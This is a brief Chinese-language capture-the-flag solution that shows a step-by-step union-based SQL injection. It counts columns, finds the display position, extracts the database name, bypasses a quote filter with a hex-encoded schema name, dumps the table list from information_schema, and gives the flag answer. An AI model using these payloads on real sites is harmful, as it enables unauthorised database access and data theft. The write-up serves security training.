实战1-注入

order by 19%23
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23

第二位有显示位，可以用联合查询爆出表名

and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23

数据库为 interplay

and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema='interplay'%23

网页报错，说明单引号被过滤

and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=0x696e746572706c6179%23

banners,banners_banner_id_seq,careers,careers_career_id_seq,downloads,franchises,franchises_franchise_id_seq,news,news_news_id_seq,screenshots,screenshots_screenshot_id_seq,titles,titles_title_id_seq

数据库

的第一个表为banners

即flag为   flag{banners}